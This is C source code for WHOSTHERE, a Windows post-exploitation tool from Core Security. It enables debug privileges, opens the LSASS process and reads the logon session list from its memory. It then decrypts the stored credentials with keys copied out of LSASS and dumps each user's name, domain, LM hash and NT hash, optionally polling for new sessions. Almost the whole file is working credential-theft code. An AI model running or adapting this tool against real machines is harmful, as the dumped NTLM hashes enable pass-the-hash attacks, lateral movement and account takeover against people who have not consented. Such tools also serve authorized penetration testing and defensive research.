// $Id: whosthere.c,v 1.28 2008/06/20 19:22:47 hochoa Exp $
//
#include <windows.h>
#include <stdio.h>
#include <psapi.h>
#include <tlhelp32.h>
#include "../iam/findfuncs.h"
#include "getopt.h"

/*
 * whosthere.c
 *
 * Description: 
 *
 * Author: Hernan Ochoa (hochoa@coresecurity.com) (hernan@gmail.com)
 *
 * Copyright (c) 2007-2008 Hernan Ochoa, Buenos Aires, Argentina.
 * All rights reserved.
 *
 *
 * THIS SOFTWARE IS PROVIDED ``AS IS'' AND ANY EXPRESS OR IMPLIED
WARRANTIES
 * ARE DISCLAIMED. IN NO EVENT SHALL CORE SDI S.A. BE LIABLE FOR ANY
DIRECT,
 * INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY OR CONSEQUENTIAL DAMAGES
 * RESULTING FROM THE USE OR MISUSE OF ANY RECOMPILATION OF THIS SOURCE
 * CODE NOT PROVIDED BY CORE SDI S.A.
 **/

static BOOL g_debugEnabled			= 0;
static BOOL g_infiniteWaitEnabled		= FALSE;
static AddressesGroup				_addrGroup;
static BOOL g_dumpToFile                        = FALSE;
static char g_dumpFile[1024];




// Windows XP SP2 LSASRV.DLL Addresses
#define FEEDBACK_ADDR_XPSP2			0x757CFBF8
#define	DESKEY_PTR_ADDR_XPSP2			0x757CFC00
#define LSAENCRYPTMEMORY_ADDR_XPSP2		0x757456C2
#define LOGON_SESSION_LIST_ADDR_XPSP2		0x757cec60
#define LOGON_SESSION_LIST_COUNT_XPSP2 		0x757cee54

// Windows Server 2003 LSASRV.DLL Addresses


// Windows Vista LSASRV.DLL Addresses


// Typedef for Ptr to LSASRV.DLL 'LsaEncryptMemory' internal function
typedef void  (*LsaEncryptMemoryFunction)(unsigned char* buff, unsigned long len, int mode);


// typedef for session information
#define LOGONSESSIONINFO_USERNAMELEN	90
#define LOGONSESSIONINFO_DOMAINNAMELEN	90

typedef struct {
	
	LUID luid;
	char username[LOGONSESSIONINFO_USERNAMELEN];
	char domainname[LOGONSESSIONINFO_DOMAINNAMELEN];
	BYTE LMhash[16];
	BYTE NThash[16]; 
		
} LOGON_SESSION_INFO;

LOGON_SESSION_INFO **g_ppLogonSessions;
unsigned int g_logonSessionsCount = 0;
unsigned int g_previousSessionCount = 0;

BOOL printLogonSession( LOGON_SESSION_INFO *pLogonSession);
BOOL addLogonSession( LOGON_SESSION_INFO* pLogonSession);
void printLogonSessionsArray();
DWORD GetPidByName( char* szProcessName );
BOOL processAddrsFromUser( char* pszString, AddressesGroup* outAddrGroup );

// Global variables
// Buffer with the DES IV
BYTE g_LsasrvIVBuffer[8];
// Buffer with the DES SK Table
BYTE g_LsasrvSKTable[1024];


 
#pragma pack  (1)
typedef struct {

	DWORD unk1;
	DWORD packageid;
	DWORD ptrToCreds;

} CREDS_ENTRY;

typedef struct {

	DWORD unk1;
	DWORD primaryLength;
	DWORD primaryPtr;
	DWORD hashesLength;
	DWORD hashesPtr;

} CREDS_HASH_ENTRY;

typedef struct {

	DWORD nextEntry;
	DWORD prevEntry;
	DWORD unk1;
	DWORD unk2;
	DWORD userSize;
	DWORD userNamePtrUnicode;
	DWORD machineSize;
	DWORD machinePtrUnicode;
	DWORD unk3;
	DWORD unk4;
	DWORD unk5Ptr;

	 } SESSION_ENTRY;



BOOL printLogonSession( LOGON_SESSION_INFO *pLogonSession)
{
unsigned int v;
FILE *fp;
	if( !pLogonSession ) return FALSE;

        if( g_dumpToFile == TRUE && strlen(g_dumpFile) > 1) {
                
                fp = fopen(g_dumpFile, "ab");
                fprintf(fp, "%s:%s:", pLogonSession->username, pLogonSession->domainname);
        	for(v=0; v<0x10; v++) fprintf(fp, "%.2X", pLogonSession->LMhash[v]);
                fprintf(fp, ":");
        	for(v=0; v<0x10; v++) fprintf(fp,"%.2X", pLogonSession->NThash[v]);
                fclose(fp);
        
        } else {
                printf("%s:%s:", pLogonSession->username, pLogonSession->domainname);
        	for(v=0; v<0x10; v++) printf("%.2X", pLogonSession->LMhash[v]);
                printf(":");
        	for(v=0; v<0x10; v++) printf("%.2X", pLogonSession->NThash[v]);
        }
	return TRUE;
}

void printLogonSessionsArray( )
{
unsigned int n;
FILE *fp;


	for(n =0; n<g_logonSessionsCount; n++){
		if( g_ppLogonSessions[n] ) {
			printLogonSession( g_ppLogonSessions[n] );
                        if( g_dumpToFile == TRUE && strlen(g_dumpFile) > 1){
                                fp = fopen(g_dumpFile, "ab");
                                fprintf(fp, "\r\n");
                                fclose(fp);
                        }
                        else printf("\n");
		}
		
	}


}

BOOL addLogonSession( LOGON_SESSION_INFO* pLogonSession)
{
unsigned int n;
BOOL bisOldSession;
LOGON_SESSION_INFO* pItem;
LOGON_SESSION_INFO** pNewArray;
unsigned int uItemsCount;
DWORD dwTemp;



	if( !pLogonSession ) return FALSE;
	
	bisOldSession = FALSE;
	for(n =0; n<g_logonSessionsCount; n++)
	{
		pItem = g_ppLogonSessions[n];
		if( pItem ) {
			if( !strcmp(pItem->username, pLogonSession->username) &&
			   !strcmp(pItem->domainname, pLogonSession->domainname) &&
			   !memcmp(pItem->LMhash, pLogonSession->LMhash, 16) &&
			   !memcmp(pItem->NThash, pLogonSession->NThash, 16) )
			{
				bisOldSession = TRUE;
				break;
			}
			
			
		}
		
	}
	
	if( bisOldSession == TRUE) return FALSE;
	
	uItemsCount = g_logonSessionsCount+1;
	pNewArray = (LOGON_SESSION_INFO**)malloc( sizeof(LOGON_SESSION_INFO*)*uItemsCount );
	if( pNewArray == NULL) {
		if( g_debugEnabled == TRUE) {
			printf("something terrible happened! could not allocate memory for new list!\n");
		}
		return FALSE;
	}
	
	// copy existing sessions to new array
	for(n=0; n<g_logonSessionsCount; n++)
			pNewArray[n] = (LOGON_SESSION_INFO*)g_ppLogonSessions[n];
	
	
	// could not add new item, this is terribleeeeeee :)
	pItem = (LOGON_SESSION_INFO*)malloc( sizeof(LOGON_SESSION_INFO) );
	if( pItem == NULL) {
		if( pNewArray ) free(pNewArray);
		return FALSE;
	}
	
	
	
	pNewArray[uItemsCount-1] = pItem;
	
	memset((BYTE*)pItem, '\x00', sizeof(LOGON_SESSION_INFO));
	strncpy(pItem->username, pLogonSession->username, LOGONSESSIONINFO_USERNAMELEN-2);
	// paranoid android, anyways not enough
	pItem->username[LOGONSESSIONINFO_USERNAMELEN-1] = '\x00';
	strncpy(pItem->domainname, pLogonSession->domainname, LOGONSESSIONINFO_DOMAINNAMELEN-1);
	// paranoid andriod, anyways not enough
	pItem->domainname[LOGONSESSIONINFO_DOMAINNAMELEN-1] = '\x00';
	memcpy(pItem->LMhash, pLogonSession->LMhash, 16);
	memcpy(pItem->NThash, pLogonSession->NThash, 16);

	g_logonSessionsCount++;
	dwTemp = (DWORD)g_ppLogonSessions;
	g_ppLogonSessions = pNewArray;
	if( dwTemp ) free( (VOID*)dwTemp );
	
	return TRUE;		
	
}

DWORD GetPidByName( char* szProcessName )
{
HANDLE hProcessSnap;
HANDLE hProcess;
PROCESSENTRY32 pe32;

	if( !szProcessName ) return 0;

	// Take a snapshot of all processes in the system.
	hProcessSnap = CreateToolhelp32Snapshot( TH32CS_SNAPPROCESS, 0 );
	if( hProcessSnap == INVALID_HANDLE_VALUE )
	{
		return 0;
	}

	// Set the size of the structure before using it.
	pe32.dwSize = sizeof( PROCESSENTRY32 );

	// Retrieve information about the first process,
	// and exit if unsuccessful
	if( !Process32First( hProcessSnap, &pe32 ) )
	{
		CloseHandle( hProcessSnap );          // clean the snapshot object
		return 0;
	}

	// Now walk the snapshot of processes, and
	// display information about each process in turn
	do
	{

		if( strstr( pe32.szExeFile, szProcessName) )
		{
			CloseHandle( hProcessSnap );
			return (DWORD)pe32.th32ProcessID;
		}


	} while( Process32Next( hProcessSnap, &pe32 ) );

	CloseHandle( hProcessSnap );
	return 0;
}


BOOL
EnableDebugPriv(
    VOID
    )

/*++

Routine Description:

    Changes the process's privilege so that kill works properly.

Arguments:


Return Value:

    TRUE             - success
    FALSE            - failure

--*/

{
    HANDLE hToken;
    LUID DebugValue;
    TOKEN_PRIVILEGES tkp;


    //
    // Retrieve a handle of the access token
    //
    if (!OpenProcessToken(GetCurrentProcess(),
            TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY,
            &hToken)) {
        printf("OpenProcessToken failed with %d\n", GetLastError());
        return FALSE;
    }

    //
    // Enable the SE_DEBUG_NAME privilege
    //
    if (!LookupPrivilegeValue((LPSTR) NULL,
            SE_DEBUG_NAME,
            &DebugValue)) {
        printf("LookupPrivilegeValue failed with %d\n", GetLastError());
        return FALSE;
    }

    tkp.PrivilegeCount = 1;
    tkp.Privileges[0].Luid = DebugValue;
    tkp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;

    AdjustTokenPrivileges(hToken,
        FALSE,
        &tkp,
        sizeof(TOKEN_PRIVILEGES),
        (PTOKEN_PRIVILEGES) NULL,
        (PDWORD) NULL);

    //
    // The return value of AdjustTokenPrivileges can't be tested
    //
    if (GetLastError() != ERROR_SUCCESS) {
        printf("AdjustTokenPrivileges failed with %d\n", GetLastError());
        return FALSE;
    }

    return TRUE;
}


// Decrypt Credentials
unsigned int EncryptDecryptCredentials(unsigned char *pInBuffer, unsigned char *pOutBuffer, unsigned int len, int mode)
{
HANDLE hDll;
BYTE *tmpBuffer;
LsaEncryptMemoryFunction LsaEncryptMemory;


	if( pInBuffer == NULL || pOutBuffer == NULL || len == 0 ) return FALSE;	

	hDll = LoadLibrary("LSASRV.DLL");
	if( hDll == INVALID_HANDLE_VALUE ) {
		return FALSE;
	}

	tmpBuffer = (BYTE*)malloc( len );
	if( tmpBuffer == NULL ) return FALSE;

	LsaEncryptMemory = (LsaEncryptMemoryFunction)_addrGroup.pEncryptMemory;
		
	memcpy((BYTE*)_addrGroup.pFeedback, &g_LsasrvIVBuffer[0], 8);
	*((DWORD*)_addrGroup.pDESKey) = (unsigned long)&g_LsasrvSKTable;

	memcpy(tmpBuffer, pInBuffer, len);	
	LsaEncryptMemory(tmpBuffer, len, mode);
	memcpy(pOutBuffer, tmpBuffer, len);

	free(tmpBuffer);
	FreeLibrary(hDll);
	return TRUE;
}


BOOL processAddrsFromUser( char* pszString, AddressesGroup* outAddrGroup )
{
char szSuppliedAddrs[100];
unsigned int uColonCount;
char *ptr;
unsigned int uNum, n;

	if( !pszString ) return FALSE;

	// copy <string> from -a <string> to buffer
	ZeroMemory( szSuppliedAddrs, sizeof(szSuppliedAddrs) );
	strncpy( szSuppliedAddrs, pszString, sizeof(szSuppliedAddrs)-1 );
	szSuppliedAddrs[ sizeof(szSuppliedAddrs) -1 ] = '\x00';	

	// If there are not 5 ':'s, then the format of the supplied addresses is wrong
	uColonCount = 0;
	for(n=0; n<strlen(szSuppliedAddrs); n++) {
		if( szSuppliedAddrs[n] == ':' ) 
		uColonCount++;
	}

	if( uColonCount != 5 ) {
		return FALSE;
	}

	// now obtain the 6 addresses
	uColonCount = 0;
	ptr = strtok( szSuppliedAddrs, ":");
	if( ptr == NULL ) {
		return FALSE;
	}

	uNum = strtol( ptr, NULL, 16);
	outAddrGroup->pAddCredential = (PBYTE)uNum;
	n=1;
	while ( (ptr = strtok(NULL, ":")) != NULL )
	{
		uNum = strtol(ptr, NULL, 16 );
		switch(n) {
			case 1:
				outAddrGroup->pEncryptMemory = (PBYTE)uNum;
				break;
			case 2:
				outAddrGroup->pFeedback = (PBYTE)uNum;
				break;
			case 3:
				outAddrGroup->pDESKey = (PBYTE)uNum;
				break;
			case 4:
				outAddrGroup->pLogonSessionList = (PBYTE)uNum;
				break;
			case 5:
				outAddrGroup->pLogonSessionListCount = (PBYTE)uNum;
				break;
			default:
				return FALSE;
		}
		n++;
	}
	if( n != 6 ) {
		return FALSE;
	}


//	printf("%.8Xh\n", outAddrGroup->pAddCredential);
//	printf("%.8Xh\n", outAddrGroup->pEncryptMemory);
//	printf("%.8Xh\n", outAddrGroup->pFeedback);
//	printf("%.8Xh\n", outAddrGroup->pDESKey);
//	printf("%.8Xh\n", outAddrGroup->pLogonSessionList);
//	printf("%.8Xh\n", outAddrGroup->pLogonSessionListCount);


	return TRUE;

}

void banner(void)
{

	printf("WHOSTHERE v1.4 - by Hernan Ochoa (hochoa@coresecurity.com, hernan@gmail.com) - (c) 2007-2008 Core Security Technologies\n");
	printf("This tool lists the active LSA logon sessions with NTLM credentials.\n");
	printf("(use -h for help).\n");
}

void help(void)
{
	printf("Options:  (note: -B to try to find out the correct addresses in run-time, is now used by default).\n");
	printf("\t-D\t\tprints debug information.\n");
	printf("\t-i\t\twhosthere enters an infinite loop and searches for new logon sessions every 2 seconds. Only new sessions are shown if found.\n");
	printf("\t-t\t\testablishes interval used by the -i switch (by default 2 seconds).\n");
	printf("\t-o\t\tdump output to a file, -o filename\n");
	printf("\t-a\t\tspecify addresses to use. Format: ADDCREDENTIAL_ADDR:ENCRYPTMEMORY_ADDR:FEEDBACK_ADDR:DESKEY_ADDR:LOGONSESSIONLIST_ADDR:LOGONSESSIONLIST_COUNT_ADDR (WARNING!: if you use the wrong values the system may crash)\n");

	
}


int main(int argc, char **argv)
{
HANDLE hLSASS;
DWORD dwLSASS_pid;
char buffer[1024];
DWORD dwBytesRead, dwTemp;
BOOL bRet;
DWORD sessionEntryBuffer[0x48+4];
DWORD dwSessionListPtr;
DWORD dwSessionListCount;
DWORD dwSessionListEntryPtr;
SESSION_ENTRY* pEntry;
CREDS_ENTRY credsEntry;
unsigned int n=0, x=0, y=0, h, j;
PBYTE pTemp;
DWORD credPtr;
CREDS_HASH_ENTRY credsHashEntry;
char hashesBuffer[1024];
DWORD ptrToSK;
BOOL bFindFuncs, buseSuppliedAddrs;
LOGON_SESSION_INFO _logonSessionInfo;
double searchInterval = 0; 				


		banner();

		
		// find functions by default
		bFindFuncs = TRUE;
		// do not use user supplied Addresses by default
		buseSuppliedAddrs = FALSE;

		// Set the addresses to the default 2976, xpsp2, english lsasrv.dll
		_addrGroup.pAddCredential = (PBYTE)VALUE_UNKNOWN;
		_addrGroup.pEncryptMemory = (PBYTE)LSAENCRYPTMEMORY_ADDR_XPSP2;
		_addrGroup.pFeedback = (PBYTE)FEEDBACK_ADDR_XPSP2;
		_addrGroup.pDESKey = (PBYTE)DESKEY_PTR_ADDR_XPSP2;
		_addrGroup.pLogonSessionList = (PBYTE)LOGON_SESSION_LIST_ADDR_XPSP2;
		_addrGroup.pLogonSessionListCount = (PBYTE)LOGON_SESSION_LIST_COUNT_XPSP2;

		// check parameters
		while(1) {
			unsigned int c = getopt(argc, argv, "-IiDhHo:t:a:");
			if( c == -1 ) break;
			
			switch( c ) {
				case 'D': g_debugEnabled = 1; break;
                                case 'H':
				case 'h':
                                        help();
					return 0;
				case 'a':
					// process user supplied addresses
					buseSuppliedAddrs = processAddrsFromUser( optarg, &_addrGroup );
					if( buseSuppliedAddrs == FALSE ) {
						printf("Wrong format of supplied addresses!");
						exit(0);
					}
					break;

				case 'o':
                                        // whatever...
                                        memset(g_dumpFile, '\x00', sizeof(g_dumpFile));
                                        strncpy(g_dumpFile, optarg, sizeof(g_dumpFile)-1);
                                        g_dumpFile[ sizeof(g_dumpFile)-1] = '\x00';
                                        g_dumpToFile = TRUE;
                                        break;
				case 'i':
				case 'I':
					g_infiniteWaitEnabled = TRUE;
					searchInterval = 2;
					break;
				case 't':
					searchInterval = atof(optarg);
					break;
				
				default:
                                        break;
					
					
				
			}
			
		}

		if( buseSuppliedAddrs == FALSE ) {
			// if bFindFuncs, try to find the addresses using heuristics
			if( bFindFuncs == TRUE ) {
						AddressesGroup aGroup;
						//printf("-B specified. Trying to find correct addresses..");
						printf("-B is now used by default. Trying to find correct addresses..");
						if( findFuncs(&aGroup) == FALSE ) {
								printf("Can't find addresses!.\n");
								return 0;
						}

						if( aGroup.pAddCredential == VALUE_UNKNOWN ||
							aGroup.pEncryptMemory == VALUE_UNKNOWN ||
							aGroup.pFeedback == VALUE_UNKNOWN ||
							aGroup.pDESKey == VALUE_UNKNOWN ||
							aGroup.pLogonSessionList == VALUE_UNKNOWN ||
							aGroup.pLogonSessionListCount == VALUE_UNKNOWN ) {

								printf("Failed! (the address group was not correctly identified!. email the author!)\n");
								exit(0);
						}

						// We found the addresses, so copy those to the global structure
						printf("Found!.\n");
						_addrGroup = aGroup;
			}
		}


		if( EnableDebugPriv() == FALSE ) {
					printf("Could not enable debug privileges. You must run this tool with an account with administrator privileges.\n");
					exit(0);
		}

		memset(buffer, '\0', 1024);


		dwLSASS_pid = GetPidByName("lsass.exe");
		if( dwLSASS_pid == 0 ) {
			printf("Cannot get LSASS.EXE PID!\n");
			exit(0);
		}

		hLSASS = OpenProcess(PROCESS_ALL_ACCESS, FALSE, dwLSASS_pid);

		if( g_debugEnabled ) {

		printf("LSASS HANDLE: %x\n", hLSASS);

		}
		
		if( hLSASS == INVALID_HANDLE_VALUE ) {
			printf("Error: Cannot open LSASS.EXE!.\n");
			exit(0);
		}


		if( searchInterval )
			printf("Time Interval (in seconds): %f\n", searchInterval);
		
		printf("the output format is: username:domain:lmhash:nthash\n\n");
	

//agg what a horrible hack! :)
endlessLoop:

		// here we begin the process of obtaining the credentials from memory
		
		// Read 'IV' From LSASS' Memory
		bRet = ReadProcessMemory(hLSASS, (LPCVOID)_addrGroup.pFeedback,
		(LPVOID)&g_LsasrvIVBuffer[0], 8, &dwBytesRead);

		if(bRet == FALSE || dwBytesRead != 8 ) {
			printf("Cannot read IV from LSASS!.\n");
			exit(0);
		}

		if( g_debugEnabled ) {
			
			printf("IV = ");
			for(j = 0; j<8; j++) {
				printf("%.2Xh ", (unsigned char)g_LsasrvIVBuffer[j]);
			}
			printf("\n");
		}

		// Read Prt to 'SK' table from LSASS' Memory
		bRet = ReadProcessMemory(hLSASS, (LPCVOID)_addrGroup.pDESKey,
		(LPVOID)&ptrToSK, 4, &dwBytesRead);

		if(bRet == FALSE || dwBytesRead != 4 ) {
			printf("Cannot read ptr to SK Table from LSASS!.\n");
			exit(0);
		}

		// Now Read data in 'SK' table from LSASS' Memory
		bRet = ReadProcessMemory(hLSASS, (LPCVOID)ptrToSK,
		(LPVOID)&g_LsasrvSKTable[0], 0x190, &dwBytesRead);

		if(bRet == FALSE || dwBytesRead != 0x190 ) {
			printf("Cannot read ptr to SK Table from LSASS!.\n");
			exit(0);
		}

		if( g_debugEnabled ) {
			printf("DESXKey Table = ");
			for(j = 0; j<0x190; j++) {
				printf("%.2Xh ", (unsigned char)g_LsasrvSKTable[j]);
			}
			printf("\n");
		}



		bRet = ReadProcessMemory(hLSASS, (LPCVOID)_addrGroup.pLogonSessionList, (LPVOID)&buffer[0], 4,&dwBytesRead);
		if(bRet == FALSE || dwBytesRead != 4 ) {
				printf("Error: cannot read Logon session list address.\n");
				exit(0);
		}

		dwSessionListPtr = *(DWORD*)&buffer[0];

		if( g_debugEnabled ) {
			printf("Session List Address: %.8Xh\n", dwSessionListPtr);
		}

		bRet = ReadProcessMemory(hLSASS, (LPCVOID)_addrGroup.pLogonSessionListCount, (LPVOID)&buffer[0], 4, &dwBytesRead);

		if( bRet == FALSE || dwBytesRead != 4 ) {
			printf("Error: cannot read Logon Session List Count!.\n");
			exit(0);
		}

		dwSessionListCount = *(DWORD*)&buffer[0];
		if( g_debugEnabled ) {		
			printf("Session List Count: %d\n", dwSessionListCount);
		}

		// Read Entry
		dwSessionListEntryPtr = dwSessionListPtr;

		for(y=0; y<dwSessionListCount; y++) {

			bRet = ReadProcessMemory(hLSASS, (LPCVOID)dwSessionListEntryPtr, (LPVOID)&sessionEntryBuffer, 0x48+4, &dwBytesRead);
				if( bRet == FALSE || dwBytesRead != 0x48+4 ) {
					printf("Error: cannot List Session List Entry!.\n");
					exit(0);
				}

			pEntry = (SESSION_ENTRY*)&sessionEntryBuffer[0];
			
			if( g_debugEnabled ) {

				printf("NEXT: %.8Xh\n", pEntry->nextEntry);
			}

			dwSessionListEntryPtr=pEntry->nextEntry;

			if( g_debugEnabled) {

				printf("PREV: %.8Xh\n", pEntry->prevEntry);
				printf("\tusersize: %.8xh\n", pEntry->userSize);
				printf("\tuserNamePtrUnicode: %.8xh\n", pEntry->userNamePtrUnicode);
				printf("\tmachineSize: %.8Xh\n", pEntry->machineSize);
				printf("\tmachinePtrUnicode: %.8Xh\n", pEntry->machinePtrUnicode);

			}

			pTemp = (PBYTE)&sessionEntryBuffer[0];
			pTemp += 0x48;
			//printf("CredentialsPtr: %.8Xh\n", *((DWORD*)pTemp));
			// Read Credentials struct
			credPtr = *((DWORD*)pTemp);

			if( credPtr != (DWORD)NULL ) {

				bRet  = ReadProcessMemory(hLSASS, (LPCVOID)credPtr, (LPVOID)&credsEntry, sizeof(CREDS_ENTRY), &dwBytesRead);

					if( bRet == FALSE || dwBytesRead != sizeof(CREDS_ENTRY) ) {
						printf("Error: Cannot read credentials!.\n");
						// ok, in this version I'll let the tool do its best :)
						continue;
						//exit(0);
					}

				if( g_debugEnabled ) {
					// Print some info about credentials
					printf("\tunkown1: %.8Xh\n", credsEntry.unk1);
					printf("\tpackageid: %.8Xh\n", credsEntry.packageid);
					printf("\tptrToCreds: %.8Xh\n", credsEntry.ptrToCreds);
				}

				// read credentials hash struct
				bRet = ReadProcessMemory(hLSASS, (LPCVOID)credsEntry.ptrToCreds,
					(LPVOID)&credsHashEntry, sizeof(CREDS_HASH_ENTRY),
					&dwBytesRead);

				if( bRet == FALSE || dwBytesRead != sizeof(CREDS_HASH_ENTRY) ) {
						printf("Error: Cannot read credentials hash struct!.\n");
						exit(0);
				}

				if( g_debugEnabled ) {

					printf("\tunknown 1: %.8Xh\n", credsHashEntry.unk1);
					printf("\tprimaryLength: %.8Xh\n", credsHashEntry.primaryLength);
					printf("\tprimaryPtr: %.8Xh\n", credsHashEntry.primaryPtr);
					printf("\thashesLength: %.8Xh\n", credsHashEntry.hashesLength);
					printf("\thashesPtr: %.8Xh\n", credsHashEntry.hashesPtr);
				}
				// read hashes ptr
				//x = (credsHashEntry.hashesLength)&0x0000ffff;
				x = (credsHashEntry.hashesLength)>>16;

				if( g_debugEnabled ) {
					printf("\thashesRealLength: %.8Xh\n", x);
				}

				bRet = ReadProcessMemory(hLSASS, (LPCVOID)credsHashEntry.hashesPtr,
					(LPVOID)hashesBuffer, x, &dwBytesRead);

				if( bRet == FALSE || dwBytesRead != x ) {
					printf("Error: cannor read hashes ptr!.\n");
					exit(0);
				}

				#if 0
					printf("\t");
					// print creds encrypted
					for(j=0; j<x; j++) {
						printf("\\x%.2X", (unsigned char)hashesBuffer[j]);
					}

				printf("\n");
				#endif


				// Decrypt Credentials
				{
				BYTE outBuffer[2048];
				// format
				// DWORD len,maxlen
				// OFFSEt to USERNAME
				// DWORD len,maxlen
				// OFFSET to DOMAIN
				// byte lm[16]
				// byte nt[16]
				// dataaa
				unsigned int v, usernameLen, domainLen, usernameOffset, domainOffset;
				EncryptDecryptCredentials(hashesBuffer, outBuffer, x, 0);
				//printf("\t"); 
				//for(j=0; j<x; j++) {
				//		printf("\\x%.2X", (unsigned char)outBuffer[j]);
				//}	
				//printf("\n");
				domainLen = *((DWORD*)&outBuffer);
				domainLen &= 0x0000FFFFL;
				domainOffset = *((DWORD*)&outBuffer[4]);
				usernameLen = *((DWORD*)&outBuffer[8]);
				usernameLen &= 0x0000FFFFL;
				usernameOffset = *((DWORD*)&outBuffer[12]);

				if( g_debugEnabled ) {

					printf("usernameLen: %.8Xh\n", usernameLen);
					printf("usernameOffset: %.8Xh\n", usernameOffset);
					printf("domainLen: %.8Xh\n", domainLen);
					printf("domainOffset: %.8Xh\n", domainOffset);
				}
				if( g_debugEnabled ) {
					printf("\n\t");
				} else {
					//printf("\n");
				}

				// copy data to _logonSessionInfo
				memset( _logonSessionInfo.username, '\x00', LOGONSESSIONINFO_USERNAMELEN);
				memset( _logonSessionInfo.domainname, '\x00', LOGONSESSIONINFO_DOMAINNAMELEN);
				
				for(v=0, h = 0; v<usernameLen, v<LOGONSESSIONINFO_USERNAMELEN-1; v+=2, h++) {
					_logonSessionInfo.username[h] = (char)outBuffer[usernameOffset+v];
				};
				for(v=0, h = 0; v<domainLen, v<LOGONSESSIONINFO_USERNAMELEN-1; v+=2, h++) {
					_logonSessionInfo.domainname[h] = (char)outBuffer[domainOffset+v];
				}
				
				// copy hashes to _logonSessionInfo
				memcpy((PBYTE)&_logonSessionInfo.NThash[0], (PBYTE)&outBuffer+0x10, 0x10);
				memcpy((PBYTE)&_logonSessionInfo.LMhash[0], (PBYTE)&outBuffer+0x20, 0x10);
				
				// print the logon session info to the console
				//printLogonSession( &_logonSessionInfo );
				addLogonSession( &_logonSessionInfo );
	
				
				
				}

		}


		// Read User Name
		x = (pEntry->userSize)&0x0000FFFFL;
		bRet = ReadProcessMemory(hLSASS, (LPCVOID)pEntry->userNamePtrUnicode,
			(LPVOID)&buffer[0], x, &dwBytesRead);

		if( bRet == FALSE || dwBytesRead != x ) {
			printf("Error: Cannot read usernamePtrUnicode!.\n");
			exit(0);
		}


		if( g_debugEnabled ) {

			printf("\tUsername: ");
			pTemp = (PBYTE)&buffer[0];
			for(n=0; n<x/2; n++)
			{
				putchar(*pTemp);
				pTemp +=2;
			}
			puts("\n");
		}


		// Read DOMAIN NAME
		//printf("machinePtrUnicode: %.8Xh\n", pEntry->machinePtrUnicode);	
		x = (pEntry->machineSize)&0x0000FFFFL;
		bRet = ReadProcessMemory(hLSASS, (LPCVOID)pEntry->machinePtrUnicode,
			(LPVOID)&buffer[0], x, &dwBytesRead);

		if( bRet == FALSE || dwBytesRead != x ) {
			printf("Error: Cannot read machinePtrUnicode!.\n");
			exit(0);
		}

		if( g_debugEnabled ) {

			printf("\tDomain/Workgroup/Machine Name: ");
			pTemp = (PBYTE)&buffer[0];
			for(n=0; n<x/2; n++)
			{
				putchar(*pTemp);
				pTemp +=2;
			}
			puts("\n");
		}



	}
	

	if( g_infiniteWaitEnabled ) {

		
		if( g_logonSessionsCount > g_previousSessionCount)
		{
			
			for(n=0; n<g_logonSessionsCount-g_previousSessionCount; n++) {
				printLogonSession( g_ppLogonSessions[n+g_previousSessionCount] );
				if( !g_dumpToFile )
                                        printf("\n");
                                else {
                                        FILE *fp;
                                        fp = fopen(g_dumpFile, "ab");
                                        fprintf(fp, "\r\n");
                                        fclose(fp);
                                        
                                }
			}
				
				
			g_previousSessionCount = g_logonSessionsCount;
		}

		Sleep(searchInterval*1000);
		goto endlessLoop;
		
		
	}
		

	
	printLogonSessionsArray();
	
	


}
